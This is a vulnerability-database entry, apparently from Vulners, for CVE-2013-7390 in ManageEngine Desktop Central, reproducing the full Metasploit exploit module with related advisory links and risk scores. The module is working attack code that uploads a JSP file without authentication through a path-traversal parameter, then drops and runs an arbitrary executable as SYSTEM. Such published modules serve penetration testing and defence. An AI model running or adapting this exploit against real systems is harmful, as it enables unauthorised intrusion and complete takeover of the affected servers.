Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload

🗓️ 18 Nov 2013 03:11:28Reported by Thomas Hibbert <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 38 Views

ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload vulnerability in Desktop Central v7 to v8 build 80293. Upload JSP file, execute payload as SYSTEM

Related
Code
ReporterTitlePublishedViews
Family
0day.today		ManageEngine Desktop Central - Arbitrary File Upload / RCE Vulnerabilities
1 Sep 201400:00
zdt
Circl		CVE-2013-7390
25 Nov 201300:00
circl
CVE		CVE-2013-7390
27 Jan 202017:33
cve
Cvelist		CVE-2013-7390
27 Jan 202017:33
cvelist
exploitpack		ManageEngine Desktop Central - Arbitrary File Upload Remote Code Execution
1 Sep 201400:00
exploitpack
Tenable Nessus		ManageEngine Desktop Central AgentLogUploadServlet Arbitrary File Upload RCE (intrusive check)
4 Dec 201300:00
nessus
Tenable Nessus		ManageEngine Desktop Central AgentLogUploadServlet Arbitrary File Upload
4 Dec 201300:00
nessus
NVD		CVE-2013-7390
27 Jan 202018:15
nvd
OpenVAS		ManageEngine Desktop Central < 8.0.293 Arbitrary File Upload Vulnerability
20 Nov 201300:00
openvas
Packet Storm		ManageEngine Desktop Central Remote Shell Upload
31 Aug 201400:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to
        v8 build 80293. A malicious user can upload a JSP file into the web root without
        authentication, leading to arbitrary code execution as SYSTEM.
      },
      'Author'         =>
        [
          'Thomas Hibbert <thomas.hibbert[at]security-assessment.com>' # Vulnerability discovery and MSF module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-7390'],
          ['OSVDB', '100008'],
          ['URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf'],
          ['URL', 'https://seclists.org/fulldisclosure/2013/Nov/130'],
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          [ 'Desktop Central v7 - v8 build 80292 / Windows', {} ]
        ],
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2013-11-11'
    ))

    register_options([Opt::RPORT(8020)])
  end


  def upload_file(filename, contents)
    res = send_request_cgi({
      'uri'       => normalize_uri('agentLogUploader'),
      'method'    => 'POST',
      'data'      => contents,
      'ctype'     => 'text/html',
      'encode_params' => false,
      'vars_get'  => {
        'computerName'  => 'DesktopCentral',
        'domainName'    => 'webapps',
        'customerId'    => '..',
        'filename'      => filename
      }
    })

    if res && res.code == 200 && res.body.to_s.empty?
      return true
    else
      return false
    end
  end

  # Test for Desktop Central
  def check
    res = send_request_cgi({
      'uri' => normalize_uri("configurations.do"),
      'method' => 'GET'
    })

    if res && res.code == 200
      build = nil

      if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
          res.body.to_s =~ /ManageEngine Desktop Central MSP 7/     # DC v7

        print_status("Detected Desktop Central v7")
      elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
          res.body.to_s =~ /ManageEngine Desktop Central MSP 8/

        if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/  # DC v8 (later versions)
          build = $1
          print_status("Detected Desktop Central v8 #{build}")
        else                                                     # DC v8 (earlier versions)
          print_status("Detected Desktop Central v8")
        end
      elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
        build = $1
      end

      if build.nil?
        return Exploit::CheckCode::Unknown
      elsif Rex::Version.new(build) < Rex::Version.new("80293")
        return Exploit::CheckCode::Appears
      else
        return Exploit::CheckCode::Safe
      end
    end

    Exploit::CheckCode::Unknown
  end


  def exploit
    print_status("Uploading JSP to execute the payload")

    exe = payload.encoded_exe
    exe_filename = rand_text_alpha_lower(8) + ".exe"

    dropper = jsp_drop_and_execute(exe, exe_filename)
    dropper_filename = rand_text_alpha_lower(8) + ".jsp"

    if upload_file(dropper_filename, dropper)
      register_files_for_cleanup(exe_filename)
      register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{dropper_filename}")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
    end

    print_status("Executing payload")
    send_request_cgi(
    {
      'uri'    => normalize_uri(dropper_filename),
      'method' => 'GET'
    })
  end


  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end


  def jsp_execute_command(command)
    jspraw =  %Q|\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end


  def jsp_drop_and_execute(bin_data, output_file)
    jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2021 16:47Current
10High risk
Vulners AI Score10
CVSS 27.5
CVSS 3.19.8
EPSS0.6678
arbitrary file uploaddesktop centraljsp fileauthenticationcode executioncveosvdbwindows
38